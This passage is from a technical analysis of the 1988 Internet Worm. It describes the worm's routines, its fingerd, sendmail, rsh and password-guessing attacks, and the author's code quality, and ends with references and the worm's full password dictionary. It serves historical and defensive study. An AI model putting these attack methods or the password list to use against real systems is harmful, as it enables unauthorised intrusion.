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net Worm Program: An Analys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due Technical Report CSD-TR-82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gene H. Spaff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artment of Computer Sciences Purdue Univer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st Lafayette, IN 47907-200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f@cs.purdue.ed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evening of 2 November 1988, someone infected the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worm program. That program exploited flaws in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in systems based on BSD-derived versions of UNIX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ws allowed the program to break into those machines and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, thus infecting those systems. This infection even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ead to thousands of machines, and disrupted normal activ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ternet connectivity for many days. This report giv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ed description of the components of the w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\320data and functions. It is based on study of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ly independent reverse-compilations of the wor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disassembled to VAX assembly language. Almost no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s given in the paper because of current concerns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of the ``immune system'' of Internet hosts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should be detailed enough to allow the rea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 the behavior of the program. The paper contai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ew of the security flaws exploited by the worm progra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s some recommendations on how to eliminate or mitigat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 use. The report also includes an analysis of the co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and methods used by the author\(s\) of the worm, and dra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onclusions about his abilities and int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1988 by Eugene H. Spafford.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is hereby granted to make copies of this work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, solely for the purposes of instruction and research.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copies must include a copy of this title page and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. Any other reproduction, publication, or use is stri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hibited without express written permission. November 29, 198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net Worm Program: An Analy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due Technical Report CSD-TR-8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gene H. Spaff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artment of Computer Sci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due University West Lafayette, IN 47907-200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f@cs.purdue.ed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evening of 2 November 1988 the Internet came under at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From within. Sometime round 6 PM EST, a program was execu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r more hosts connected to the Internet.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ed host, network, and user information, then brok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machines ???using flaws present in those systems'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breaking in, the program would replicate itself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ica would also attempt to infect other systems. Alth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ould only infect Sun Microsystems Sun 3 systems, and V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 running variants of 4 BSD UNIX the program sp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ly, as did the confusion and consternation of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nistrators and users as they discovered that their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been infected. Although UNIX has long been known to hav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 weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\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pe of the breakins came as a great surprise to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one. he program was mysterious to users at sites wher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ed. Unusual files were left in the usr/tmp direct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machines, and strange messages appeared in the log fi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utilities, such as the sendmail mail handling ag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noticeable effect, however, was that systems becam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ore loaded with running processes as they became repeate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. As time went on, some of these machines becam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that they were unable to continue any processing;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s failed completely when their swap space or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s were exhausted. By late Thursday night, personnel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 of California at Berkeley and at Massachuset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itute of Technology had ``captured'' copies o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egan to analyze it. People at other sites also bega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y the program and were developing methods of eradicating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mon fear was that the program was somehow tamper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resources in a way that could not be readily detec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hile a cure was being sought, system files wer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ed or information destroyed. By 5 AM EST Thursday mor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 than 12 hours after the infection started on the netwo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 Systems Research Group at Berkeley had develop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im set of steps to halt its spread. This includ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liminary patch to the sendmail mail agent, and the sugg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name one or both of the C compiler and loader to pr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use. These suggestions were published in mailing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usenet, although their spread was hampered by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nnecting from the Internet to attempt a ``quarantine.'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bout 7 PM EST Thursday, another simple, effective meth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ping the infection, without renaming system utilities,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vered at Purdue and also widely published. Software p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posted by the Berkeley group at the same time to me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laws that enabled the program to invade systems. Al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ed was to analyze the code that caused the problems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mber 8, the National Computer Security Center hel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tily-convened workshop in Baltimore. The topic of discu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the program and what it meant to the internet community.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at that meeting and why they were invited, and the top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ed have not yet been made publi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one thing we know that was decided by those presen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eting was that they would not distribute copies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rse-engineered code to the general public. It was fel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exploited too many little-known techniques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it generally available would only provide other attack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ramework to build another such program. Although such a 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well-intended, it can serve only as a delaying tactic. A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mber 27, I am aware of at least five vers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iled code, and because of the widespread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nary, I am sure there are at least ten times that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already completed or in progress and the required ski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ols are too readily available within the commun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ieve that only a few groups have the capability to recon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code. any system administrators, programmer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s are interested in how the program managed to estab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 on their systems and spread so quickly These individu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 valid interest in seeing the code, especially if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vendors. Their interest is not to duplicate the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o be sure that all the holes used by the program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ly plugged. Furthermore, examining the code may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nistrators and vendors develop defenses against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ks, despite the claims to the contrary by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s with copies of the reverse-engineered cod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is intended to serve an interim role in this proces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detailed description of how the program works,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source code that could be used to create a new w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As such, this should be an aid to those individu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king a better understanding of how the code worked, ye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uch a form that it cannot be used to create a new w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considerable effort. Section 3 and Appendix C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observations about some of the flaws in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oited by the program, and their fixes. A companion report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ssued in a few weeks, will contain a history of the wor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ead through the Internet. This analysis is the resul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y performed on three separate reverse-engineered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m code. Two of these versions are in C code, and o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X assembler. All three agree in all but the most min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C version of the code compiles to binary that is identic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code, except for minor differences o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ce. As such, I can state with some certainty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as only one version of the worm program, then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ign in intent. The worm did not write to the fil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when transferring itself into a target system. It also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ransmit any information from infected systems to any s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an copies of the worm program itself. Since the Berkel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Systems Research Group as already published offi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s to the flaws exploited by the program, we do no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ry about these specific attacks being used again. Many vend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lso issued appropriate patches. It now remains to conv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maining vendors to issue fixes, and users to install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olog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seems to be considerable variation in the names appl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described in this paper. I use the term worm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virus based on its behavior. Members of the press hav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rm virus, possibly because their experience to dat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only with that form of security problem. This usag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inforced by quotes from computer managers and programmer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amiliar with the terminology. For purposes of clarif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ology, let me define the difference between these two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ive some citations to their origins:  worm is a progra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run by itself and can propagate a fully working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 to other machines. It is derived from the word tapeworm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sitic organism that lives inside a host and sap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s to maintain itself.  virus is a piece of code that ad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 to other programs, including operating systems. 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independently and it requires that its ``host'' program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to activate it. As such, it has a clear analog to bio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es and those viruses are not considered alive in  the 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e; instead, they invade host cells and corrupt them, ca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to produce  new viruses.  The program that was loo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was clearly a wor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1. Worm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cept of a worm program that spreads itself from machi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achine was  apparently first described by John Brunner in 19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his classic science fiction novel The Shockwave Ri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run75]  He called these programs tapeworms that l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`inside'' the computers  and spread themselves t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s. In 1979-1981, researchers at Xerox PARC built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mented with worm programs. They reported their experi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 article in 1982 in Communications of the ACM.  [Shoc82]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ms built at PARC were designed to travel from machi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and do useful  work in a distributed environment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not used at that time to break into systems,  althoug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``get away'' during the tests. A few people seem to p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the Internet Worm a virus because it was destructiv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believe worms are non-destructive. Not  everyone agre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net Worm was destructive, however. Since int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 are sometimes difficult to judge, using those as a na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terion is clearly insufficient. As such, worm continue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ear choice to describe this kind of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2. Virus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(use of the word virus \(to my knowledge\) to de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that infects a  computer was by David Gerrold in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ience fiction short stories about the G.O.D. machine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ies were later combined and expanded to form the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Harlie Was One. [Gerr72] (A subplot in that book describ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named VIRUS created by an unethical scientist. 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infected with VIRUS would randomly dial the phone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found another computer.  It  would then break into that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fect it with a copy of VIRUS. This program would infilt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software and slow the system down so much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me unusable  except to infect other machines\). The inven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plans to sell a program named VACCINE  that could cure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vent infection, but disaster occurred when noise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line caused VIRUS to mutate so VACCINE ceas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ive.  The term computer virus was first used in a f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by Fred Cohen at USC. [Cohe84]  He  defined the term to m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curity problem that attaches itself to other code and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nto  something that produces viruses; to quote from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er: ``We define a computer `virus' as a  program th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 other programs by modifying them to include a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olved copy of itself.'' He claimed the first computer viru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`born'' on November 3, 1983, written by  himself for a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inar cour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ested reader may also wish to consult [Denn88]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Dewd85] for further discussion of the ter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Flaws and Misfeatur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1. Specific Problem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ions of the Internet Worm exposed some specific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ws in standard services provided by BSD-derived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X. Specific patches for these flaws have been wid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lated in days since the worm program attacked the Intern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flaws and patches are  discussed he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1.1. fingerd and get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nger program is a utility that allows users to ob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bout other users. It  is usually used to iden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ll name or login name of a user, whether or not a user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logged in, and possibly other information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 such as telephone numbers  where he or she can be reach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ngerd program is intended to run as a daemon, or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, to service remote requests using the finger protoco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Harr77]  The bug exploited to break fingerd involved over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ffer the daemon used for  input. The standard C librar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routines that read input without checking for bounds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ffer involved. In particular, the gets call takes inp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uffer without doing any bounds  checking; this was the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oited by the worm.  The gets routine is not the only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flaw. The family of routines scanf/fscanf/sscanf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overrun buffers when decoding input unless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icitly  specifies limits on the number of character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. Incautious use of the sprintf routine can over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s. Use of the strcat/strcpy calls instea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ncat/strncpy routines  may also overflow their buff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experienced C programmers are aware of the probl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routines, they  continue to use them. Worse, their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 some sense codified not only by historical inclus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X and the C language, but more formally in the forth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I language standard  for C. The hazard with these call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ny network server or privileged program using  the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y be compromised by careful precalcul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appropriate input.  An important step in removing this haz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first to develop a set of replacement  call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for bounds on their program-supplied buffer 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all system servers and privileged application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ined for unchecked uses of the original  calls, with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 then being replaced by the new bounded versions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udit  has  already been performed by the group at Berkele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fingerd and timed servers used the gets call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ches to fingerd have already been posted. Appendix C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 version of fingerd written specifically for this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y be used to replace the original version. Thi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no calls to ge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1.2. Sendmail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ndmail program is a mailer designed to route mail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erogeneous internetwork.  [Allm83]  The program operat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modes, but the one of most interest is  when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as a daemon process. In this mode, the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`listening'' on (a TCP  port \(#25\) for attempts to del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using standard Internet protocols, principally SMT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(Simple Mail Transfer Protocol\).  [Post82]  When such a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etected, the daemon enters into  a dialog with the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er to determine sender, recipient, delivery instruc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contents.  The bug exploited in sendmail had to do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ality provided by a debugging  option in the cod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m would issue the DEBUG command to sendmail and then specif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t of commands instead of a user address as the recipi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sage. Normally, this (is  not allowed, but it is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ebugging code to allow testers to verify that mai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iving at a particular site without the need to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resolution routines. The debug  option of sendmai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 used because of the complexity of configuring the ma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local  conditions, and many vendors and site administra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the debug option compiled in.  The sendmail program i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nse importance on most Berkeley-derived \(and other\)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because it handles the complex tasks of mail rou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very. Yet, despite  its importance and wide-spread use,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administrators (know little about how it works.  S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ften related about how system administrators will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new device  drivers or otherwise modify the kerne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, yet they will not willingly attempt to modify  sendmai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configuration files.  It is little wonder, then, that bu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resent (in sendmail that allow unexpected behavior.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ws have been found and reported now that attention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ed on the program,  but it is not known for sure if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s have been discovered and all the patches circulated.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vious approach would be to dispose of sendmail and come (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simpler program to handle mail. Actually, for purpo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verification, developing a suite of cooperating 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a better approach, and more aligned with the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ilosophy. In effect,  sendmail is fundamentally flawed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anything related to function, (but because it is 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x and difficult to underst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rkeley Computer Systems Research Group has a new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mail with  many bug fixes and fixes for security flaw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sendmail is available for FTP from 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`ucbarpa.berkeley.edu'' and will be present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ftp/pub/sendmail.tar.Z by the  end of November 1988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is shipped with the DEBUG option disabled b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. However, this does not help system administrator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enable the DEBUG  option, although the researcher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rkeley believe they have fixed (all the security flaw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herent in that facility. One approach that could be take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ould be to have it  prompt the user for the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uper user \(root\) when the DEBUG command is given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c password should never be compiled into the program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would mean that the same password might be presen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sites and seldom changed.  For those site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o FTP or otherwise unable to obtain the new version,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icial patches to sendmail are enclosed in Appendix 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. Other Problem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 worm exploited flaws in only two server progra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behavior has served to  illustrate a few fundamental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ve not yet been widely addressed. In the interest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oting better security, some of these problems are discu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. (The interested reader is  directed to work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Gram84] for a broader discussion of related issu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.1. Servers in general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curity flaw not exploited by the worm, but now be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vious, is that many system services have configu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files owned by the same userid. Programs like  sendmai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t service, and other facilities are often all own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(non-user id. This  means that if it is possible to ab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services, it might be possible to abuse many.  On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al with the general problem is have every daem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ystem run with a  separate userid. That way, the comma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s for each subsystem could (be protected in  such a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only that subsystem could have write \(and perhaps read\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o the files.  This is effectively an implemen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ciple of least privilege. Although doing this  might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tra dozen user ids to the system, it is a small (co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, and is already sup ported in the UNIX paradigm.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hould have separate ids include sendmail, news, at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ger, ftp, uucp and Y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.2. Password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key attack of the worm program involved attempts to dis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passwords. It was  able to determine success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rypted password of each user was in a publicly readabl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llows an attacker to encrypt lists of possible pass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compare  them against the actual password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ing through any system function. In effect, the  secur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sswords is provided in large part by the prohibitive eff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rying all combinations of letters. Unfortunately, as mach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faster, the cost of such attempts decreases.  Divi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 among multiple processors further reduces the time n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rypt a password. It (is currently feasible to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computer to precalculate all probable passwords and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on optical media. Although not \(currently\) portable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me would allow someone with the appropriate resources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y account for which they could read the password  fiel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consult (their database of pre-encrypted passwords.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sity of storage  media increases, this problem will only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severe.  A clear approach to reducing the risk of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ks, and an approach that has already  been taken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nts of UNIX, would be to have a (shadow) password fi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rypted  passwords are saved in a file that is readable onl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administrators, and a privileged  call per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 encryptions and comparisons with an appropriate de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(.5 to 1 second,  for instance\). This would prevent any at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``fish'' for passwords. Additionally, a threshold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to check for repeated password attempts from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, resulting  in some form of alarm being raised. Sha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 files should be used in combination with  encry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in place of such techniques, however, or one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imply replaced  by a different one; the combin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methods is stronger than either one alone.  Another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ngthen the password mechanism would be to change the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sets user passwords. The utility currently makes min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to ensure that new passwords are nontrivial to gues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could be strengthened in such a way that it would re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hoice of a word currently in the on-line dictionary or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account n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High-Level Description of the Wor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contains a high-level overview of how the w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functions. The  description in this section assum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der is familiar with UNIX and somewhat familiar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facilities under UNIX. Section 5 describes the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and structures  in more detail.  The worm consis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parts: a main program, and a bootstrap or vector progra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(described in Appendix B\). We will start our descrip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int at which a host is  about to be infected. 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, a worm running on another machine has either succeeded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blishing a shell on the new host and has connected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ecting machine via a TCP  connection, or it has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SMTP port and is transmitting to the sendmail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ection proceeded as follows:  1\) A socket was estab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infecting machine for the vector program to connect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(e.g., socket number 32341\). A challenge string was constru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From a random number  \(e.g., 8712440\). A file name bas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constructed using a random number \(e.g.,  14481910\).  2\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ctor program was installed and executed using one of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:  2a\) Across a TCP connection to a shell, the worm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the following commands  \(the two lines beginn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`cc'' were sent as a single line\)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=/bin:/usr/bin:/usr/ucb  cd /usr/tmp  echo gorch49; sed '/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z/q' &gt; x14481910.c;echo gorch50  [text of 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\320enclosed in Appendix B]  int zz;  cc (-o x144819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14481910.c;./x14481910 128.32.134.16 32341 8712440;  rm -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14481910 x14481910.c;echo DO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it would wait for the string ``DONE'' to signal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tor program was  running.  2b\) Using the SMTP conn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transmit \(the two lines beginning with ``cc''  were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single line\)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  mail from: &lt;/dev/null&gt;  rcpt to: &lt;"|sed -e '1,/^$/'d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bin/sh ; exit 0"&gt;  data  cd /usr/tmp  cat &gt; x14481910.c &lt;&lt;'EOF'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ext of vector program\320enclosed in Appendix III]  EOF  cc -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14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;  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f x14481910 x14481910.c .   qui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ecting worm would then wait for up to 2 minut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ignated port for the vector to contact it.  3\) The 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hen connected to the ``server,'' sent the challe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, and  transferred three files: a Sun 3 binary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m, a VAX version, and the source  code for the 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After the files were copied, the running vector progra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me \(via the execl call\) the shell with its input an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connected to the server  worm.  4\) The server worm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ommand stream to the connected shell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=/bin:/usr/bin:/usr/ucb  rm -f sh  if [ -f sh ]  t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=x14481910  else  P=sh  f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, for each binary file it had transferred \(just two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, although the code is  written (to allow more\), i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the following form of command sequenc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 -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.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14481910,vax.o x14481910,l1.c  rm -f $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m would succeed only if the linked version of the w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ed to start execution. If  the server determined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was now infected, it closed the connection. Otherwise,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try the other binary file. After both binary files had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ed, it would send over rm commands for the object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 away all evidence of the attempt at infection.  5\)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m on the infected host proceeded to ``hide'' itself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curing its argument  vector, unlinking the binary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, and killing its parent \(the $$ argument i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cation\). It then read into memory each of the worm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encrypted each file  after reading it, and dele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from disk.  6\) Next, the new worm gathered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network interfaces and hosts to which the  local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connected. It built lists of these in memory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 about canonical and alternate names and addre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gathered some of this information  by making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octl calls, and by running the netstat program with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.  It also read through various system files look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names to add to its database.  7\) It randomized the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onstructed, then attempted to infect some of those hosts.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connected networks, it created a list of possibl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and attempted to infect those hosts if they exis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the type of host \(gateway or local network\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m first tried to establish a connection on the telnet or rex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s to determine reachability before it attempted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ion methods.  8\) The infection attempts proceeded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ree routes: rsh, fingerd, or sendmail.  8a\) The attack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h was done by attempting to spawn a remote shell by inv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\(in order of trial\) /usr/ucb/rsh, /usr/bin/rsh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bin/rsh. If successful, the host was  infected as in steps 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a, above.  8b\) The attack via the finger daemon was some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subtle. A connection was  established to the remote fi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 daemon and then a specially constructed  string of 53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was passed to the daemon, overflowing its input buff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writing parts of the stack. For standard 4 BSD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on VAX computers, the overflow resulted in the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 frame for the main routine being  changed so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address pointed into the buffer on the stack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that were written into the stack at that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:  pushl $68732f '/sh\\0'  pushl $6e69622f '/bin'  movl s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10  pushrl $0  pushrl $0  pushrl r10  pushrl $3  movl sp,a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mk $3b  That (is, the code executed when the main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ed to return was:  execve\("/bin/sh", 0, 0\)  On VAX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sulted in the worm connected to a remote shell via the TC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. The worm then proceeded to infect the host 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s 1 and 2a, (above.  On Suns, this simply resulted in a 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ince the code was not in place to corrupt  a Sun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gerd in a similar fashion.  8c\) The worm then tried to in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mote host by establishing a connection to the  SMTP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iling an (infection, as in step 2b, above.  Not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s were attempted. As soon as one method succeeded,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in the internal list was marked as infected and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were not attempted.  9\) Next, it entered a state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ing of five states. Each state (was run for a shor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, then the program looped back to step #7 \(attemp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k into other hosts via sendmail, finger, or rsh \)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of the five states were attempts to break into us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s on the local machine. The fifth state was the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, and occurred after all  attempts had been made to br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asswords. In the fifth state, the worm looped forev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ing to infect hosts in its internal tables and marked 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t infected. The four states  were:  9a\) The worm read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etc/hosts.equiv files and /.rhosts files to find th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quivalent hosts. These were marked in the internal tab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s. Next, the  worm read the /etc/passwd file into an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structure. As it was doing this, it  also exa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.forward file in each user home directory and included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 names in its internal table of hosts to try. Oddly, it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imilarly check user .rhosts files.  9b\) The worm attem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reak each user password using simple choices. The wor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ed the obvious case of no password. Then, it us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name and  GECOS field to try simple passwords. As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user had an entry in the  password file lik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:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh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s tried as potential passwords would be accou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account, User,  Name, user, name, and tnuocca. These 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ively, the account name, the  account name concate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tself, the first and last names of the user, the us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with leading capital letters turned to lower cas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name  reversed. Experience described in [Gram84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s that on systems where users are naive about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, these choices may work for up to 30% of user passwor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10 in this section describes what was done if a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`hit'' was achieved.  9c\) The third stage in the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ved trying to break the password of each user by  tr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word present in an internal dictionary of words \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ix I\). This  dictionary of 432 words was tried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account in a random order, with  ``hits'' being handl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in step 10, below.  9d\) The fourth stage was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ll other attempts failed. For each word in the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usr/dict/words, the worm would see if it was the password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. In addition, if the word in the dictionary began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 case letter, the letter was converted to lower ca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ord was also tried against all the passwords.  10\) On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 was broken for any account, the worm would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k into  remote machines where that user had account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m would scan the .forward and .rhosts files of the us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oint, and identify the names of remote hosts that ha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s used by the target user. It then attempted two attack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a\) The worm would first attempt to create a remote shell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xec service. The  attempt would be made using the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given in the .forward or .rhosts file  and the user's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. This took advantage of the fact that users often ha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password on their accounts on multiple machines.  10b\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m would do a rexec to the current host \(using the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name and password\) and would try a rsh comm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te host using the username taken  from the file. This at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succeed in those cases where the remote machine  h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s.equiv file or the user had a .rhosts file that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te execution  without a password.  If the remote shell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either way, the attack would continue as in steps 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a,  above. No other use was made of the user passwo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out the execution of the main loop, the worm would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ther worms running on the same machine. To do this, the w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attempt to connect to another worm on  a loc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determined TCP sock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uch a connection succeeded, one worm would \(randomly\) se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quit variable to 1, causing that worm to exit after it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hed partway  into the third stage of password cracking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is part of the reason many systems had  multiple w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: even though a worm would check for other local worm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 defer its self-destruction until significant effort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made to break local passwords.  One out of every seven w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come immortal rather than check for other local  wor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as probably done to defeat any attempt to put a fake w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on the TCP  port to kill existing worms. I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ed to the load of a machine once infected.  The w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ed to send an UDP packet to the host ernie.berkeley.ed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ximately once every 15 infections, based on a random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ison. The code to do this  was incorrect, however, an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was ever sent. Whether this was the intended rus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there was actually some reason for the byte to be s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urrently known. However, the code is such tha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nitialized byte is the intended message. It is possib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uthor eventually intended to run some monitoring progra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nie \(after breaking into an account, no doubt\).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could obtain the sending host number from the single-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, whether it was sent as a TCP or UDP packet. However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idence for such a program has been found and it is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connection was simply a feint to cast suspicion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nel at Berkeley.  The worm would also fork itself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 basis and kill its parent. This served two  purpo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the worm appeared to keep changing its process id an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process accumulated excessive amounts of cpu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ly, processes that have been running for a long  tim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priority downgraded by the scheduler. By forking,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would  regain normal scheduling priority. This mechanis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not always work correctly, either, as we  locally ob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instances of the worm with over 600 seconds of accum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u time.  If the worm ran for more than 12 hours, it would fl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host list of all entries flagged as  being immune or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. The way hosts were added to this list implies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 worm might reinfect the same machines every 12 hou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 Tour of the Wor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s a brief, high-level description of the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in the worm code.  The description covers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t functionality of the program, but does not de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the auxiliary routines used nor does it describe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or algorithms involved. It  should, however, g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a complete view of how the worm function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1. Data Structur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m had a few global data structures worth mentio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ly, the way it  handled some local data is of intere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1.1. Host lis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m constructed a linked list of host records. Each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an array of 12  character pointers to allow stor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12 host names/aliases. Each record also contained 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ix long unsigned integers for host addresses, and each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a flag field.  The only flag bits used in th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to be 0x01 \(host was a gateway\), 0x2 \(host has b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\), 0x4 \(host cannot be infected \320 not reachable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X, wrong machine type\), and  0x8 \(host was ``equivalent''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nse that it appeared in a context like .rhosts file\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1.2. Gateway Lis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m constructed a simply array of gateway IP add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use of the system netstat command. These add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used to infect directly connected networks. The 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is described in the explanation of scan_gateway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_init,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1.3. Interfaces lis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rray of records was filled in with information about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interface active on  the current host. This includ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the interface, the outgoing address, the netmask,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host if the link was point-to-poi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, and the interface flag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1.4. Pwd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nked list of records was built to hold user information.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held the  account name, the encrypted passwor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 directory, the gecos field, and a link to the  next rec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lank field was also allocated for decrypted passwords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fou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1.5. object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maintained an array of ``objects'' that hel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hat composed the worm.  Rather than have the files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disk, the program read the files into these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s.  Each record in the list contained the suffix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 \(e.g., ``sun3.o''\), the size of the file, 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rypted contents of the file. The use of this structu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1.6. Word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ini-dictionary of words was present in the worm to u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 guessing \(see  Appendix A\). The words were sto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rray, and every word was masked \(XOR\) with the  bi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80. Thus, the dictionary would not show up with an inv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trings program on the binary or object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1.7. Embedded String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text string used by the program, without exception,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ked \(XOR\) with the bit  pattern 0x81. Every time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referenced, it was referenced via a call to XS. The X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decrypted the requested string in a static cir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and returned a pointer to the  decrypted version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kept any of the text strings in the program from appe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 an invocation of strings. Simply clearing the high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\(e.g., XOR 0x80\) or displaying the  program binary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produce intelligible text. All references to X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itted  from the following text; realize that every string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encrypted.  It is not evident how the strings were pla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n this manner. The masked strings were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line in the code, so some preprocessor or a modified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iler must have been used. This represents a signific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ort by the author of the worm, and suggests quite strong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author wanted to complicate or prevent the analysi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once it was discov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2.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criptions given here are arranged in alphabetic ord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of some routines are exactly as used by the autho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. Other names are based on the function of the routi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names were chosen because the original routine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ed static and name information was not prese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files. If the reader wishes to trace the functional \257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worm, begin with the descriptions of routines m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t \(presented first for this reason\). By func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 can be \(arbitrarily\) grouped as follows: set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: main, doit, crypt, h_addaddr, h_addname, h_addr2ho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_clean, h_name2host, if_init, loadobject, makemagic, netmask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ute, rt_init, supports_rsh, and supports_telnet. network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 attacks : attack_network, attack_user, crack_0, crack_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ck_2, crack_3, cracksome, ha, hg, hi, hl, hul, inf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_gateways, sendworm, try_fingerd, try_password, try_r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_sendmail, and waithit. camouflage: checkother, other_slee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_message, and xorbu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2.1. ma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as where the program started. The first thing it did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its argument vector to make it look like it was the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. Next, it set its resource limits so a failure w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 a core file. Then it loaded all the files nam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into the object structure in memory using cal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object. If the file was not one of the objects load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m would immediately call exit. Next, the code unlinked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files, the file named sh \(the worm itself\), and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tmp/.dumb \(apparently a remnant of some earlier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possibly used as a restraint or log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ing\320the file is not otherwise referenced\).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finished zeroing out the argument vector. Next, th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call if_init. If no interfaces were discovered b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, the program would call exit. The program would then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current process group. If the process group was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parent process id \(passed on the command line\), i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 its process group and send a KILL signal to its pa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of all, the routine doit was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2.2. do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as the main worm code. First, a variable was se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time with a call to time, and the random number gen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initialized with the return value. Next, the routines h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l were invoked to infect some hosts. If one or both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ed to infect any hosts, the routine ha was invoked. Nex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 checkother was called to see if other worms were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. The routine send_message was also called to cast suspic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folks at Berkel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de then entered an infinite loop: A call would be ma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cksome followed by a call to other_sleep with a parame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Then cracksome would be called again. At this poin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would fork itself, and the parent would exit, lea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 to continue. Next, the routines hg, ha, and hi would a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to infect other hosts. If any one \(or combination\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routines failed to infect a new host, the routine hl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alled to infect a local host. Thus, the code was aggres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always infecting at least one host each pass throug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p. The logic here was faulty, however, because if all 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teway hosts were infected, or a bad set of host number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ed in ha, this code would call hl every time through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behavior was one of the reasons hosts became over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m processes: every pass through the loop, each worm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ly be forced to infect another local host. Consider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worms could run on a host for some time before on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, this could lead to an exponential growth of worms in a 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. Next, the routine other_sleep was cal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out of 120. A check was then made to see if the worm ha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than 12 hours. If so, a call was made to h_cle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a check was made of the pleasequit and nextw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(set in other_sleep or checkother, and crack_2, respectively\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pleasequit was nonzero, and nextw was greater than 10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m would ex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2.3. attack_networ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outine was designed to infect random hosts on a subn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for each of the network interfaces, if checked to se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rget host was on a network to which the current hos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connected. If so, the routine immediately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on the class of the netmask \(e.g., Class A, Class B\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constructed a list of likely network numbers. A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 was used to make good guesses at potential Class A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. All these constructed host numbers were plac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, and the list was then randomized using permute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was Class B, the permutation was done to favor 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ed hosts by doing two separate permutations\320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x hosts in the output list were guaranteed to be chose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dozen \(low-numbered\) host numbers generat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20 entries in the permuted list were the only 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ined. For each such IP address, its entry was retriev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lobal list of hosts \(if it was in the list\). If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in the list and was marked as already infected or immun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ignored. Otherwise, a check was made to see if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 the rsh command \(identifying it as existing and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SD-derived networking services\) by calling supports_rsh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did support rsh, it was entered into the hosts list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present, and a call to infect was made for that hos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uccessful infection occurred, the routine returned ear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alue of TRUE \(1\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2.4. attack_us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outine was called after a user password was broken.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incorrect code and may not work properly on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tecture because a subroutine call was missing an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on Suns and VAXen, the code will work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ng argument was supplied as an extra argum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call, and the order of the arguments on the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es between the two routines. It was largely a coincid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is worked. The routine attempted to open a .forwar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the user's home directory, and then for each host and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present in that file, it called the hul routine. It then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thing with the .rhosts file, if present, in the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2.5. check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outine was to see if another worm was present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and is a companion routine to other_sleep. Fir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 value was checked: with a probability of 1 in 7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 returned without ever doing anything\320these w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 immortal in the sense that they never again particip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rocess of thinning out multiple local worms. Otherwi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m created a socket and tried to connect to the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`worm port''\320 23357. If the connection was successful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hange of challenges was made to verify that the other sid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a fellow worm. If so, a random value was writte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ide, and a value was read from the socket. If the su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 sent plus the value read was even, the local worm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leasequit variable to 1, thus marking it for eventual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uction. The socket was then closed, and the worm open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ocket on the same port \(if it was not destined to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uct\) and set other_fd to that socket to listen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ms. If any errors were encountered during this procedur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m involved set other_fd to -1 and it return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. This meant that any error caused the worm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ortal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2.6. crack_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outine first scanned the /etc/hosts.equiv file, adding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s to the global list of hosts and setting the \257ags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rk them as equivalent.  Calls were made to name2ho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addrs. Next, a similar scan was made of the /.rhost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exact same calls. The code then called setpwent to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etc/passwd file. A loop was performed as long as pass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be read: Every 10th entry, a call was made to other_sl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timeout of 0. For each user, an attempt was made to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.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home directory of that user, and read the host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in. These hostnames were also added to the host li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d as equivalent. The encrypted password, home director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cos field for each user was stored into the pwd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ll user entries were read, the endpwent routin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ked, and the cmode variable was set to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2.7. crack_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outine tried to break passwords. It looped until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s had been tried, or until the next group of 50 acc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been tested. In the loop: A call was made to other_sleep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arameter of zero each time the loop index modulo 10 was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(i.e., every 10 calls\). Repeated calls were ma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_password with the values discussed earlier in \2474-8b.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accounts had been tried, the variable cmode was set to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2.8. crack_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outine used the mini-dictionary in an attempt to break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s \(see Appendix A\). The dictionary was first perm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(using the permute\) call. Each word was decrypted in- plac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ORing its bytes with 0x80. The decrypted word was then pas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y_password routine for each user account. The word wa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encrypted. A global index, named nextw was increme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to the next dictionary entry. The nextw index is also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oit to determine if enough effort had been expended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m could ``...go gently into that good night.'' When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words were left, the variable cmode was set to 3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interesting points to note in this routine: the rever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words were not tried, although that would seem li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al thing to do, and all words were encrypted and decry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lace rather than in a temporary buffer. This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icient than a copy while masking since no re-encryption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to be done. As discussed in the next section, many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unnecessary effort such as this were present i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more, the entire mini-dictionary was decrypted all a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a word at a time. This would seem to less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fit of encrypting those words at all, sinc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y would then be present in memory as plaintext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 all the words were tr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2.9. crack_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as the last password cracking routine. It ope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usr/dict/words, and for each word found it called try_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each account. If the first letter of the word w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ital, it was converted to lower case and retried. Afte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were tried, the variable cmode was increment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 returned. In this routine, no calls to other_sleep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spersed, thus leading to processes that ran for a long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checking for other worms on the local machine. Also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, this routine did not try the reverse of words either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2.10. crackso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outine was a simple switch statement on an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named cmode and it implemented the five strateg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ed in \2474-8 of this paper. State zero called crack_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one called crack_1,  state two called crack_2,  and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called crack_3.  The default case simply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2.11. cryp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outine took a key and a salt, then performed the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 encryption function on a block of zero bits. The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of the routine was a pointer to a character string of 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representing the encoded password. The routin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y optimized and differs considerably from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version of the same routine. It calle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: compkeys, mungE, des, and ipi. A routine, setupE,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present and was associated with this code, but it was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d. It appears to duplicate the functionalit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ngE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2.12. h_addadd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outine added alternate addresses to a host entr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 list if they were not already pres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2.13. h_addn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outine added host aliases \(names\) to a given host ent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licate entries were sup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2.14. h_addr2ho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st address provided to the routine was checked against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in the global host list to see if it was already pres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o, a pointer to that host entry was returned. If not, an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arameter flag was set, a new entry was initial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address and a pointer to it wa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2.15. h_cle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outine traversed the host list and removed any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d as infected or immune \(leaving hosts not yet tried\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2.16. h_name2ho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like h_addr2host except the comparison was done by nam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ali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2.17. h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outine tried to infect hosts on remote networks. First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ed to see if the gateways list had entries; if not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rt_init.  Next, it constructed a list of all IP add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gateway hosts that responded to the try_telnet rout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host addresses was randomized by permute.  Then,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in the list so constructed, the address was mask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 returned by netmaskfor and the result was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k_network routine. If an attack was successful, the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ed early with a return value of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2.18. h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outine attempted to infect gateway machines. It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rt_init to reinitialize the list of gateways, and the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gateway it called the main infection routine, infect,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teway as an argument. As soon as one gateway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fully infected, the routine returned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2.19. h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outine tried to infect hosts whose entries in the ho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were marked as equivalent.  The routine traversed the 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list looking for such entries and then calling infec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hosts. A successful infection returned early with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2.20. h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outine was intended to attack hosts on directly-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s. For each alternate address of the current hos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 attack_network was called with an argument consis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dress logically and-ed with the value of netmask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. A success caused the routine to return early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value of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2.21. hu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attempted to attack a remote host via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. It first checked to make sure that the host was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host and that it had not already been marked as inf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it called getaddrs to be sure there was an addres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. It examined the username for punctuation character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if any were found. It then called other_sleep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of 1. Next, the code tried the attacks describ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2474-10. Calls were made to sendworm if either attack succ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stablishing a shell on the remote mach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2.22. if_in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outine constructed the list of interfaces using ioct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. In summary, it obtained information about each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as up and running, including the destination addres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-to-point links, and any netmask for that interface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ed the me pointer to the first non-loopback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, and it entered all alternate addresses in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2.23. infec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as the main infection routine. First, the host argumen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ed to make sure that it was not the current host,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not currently infected, and that it had not been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immune. Next, a 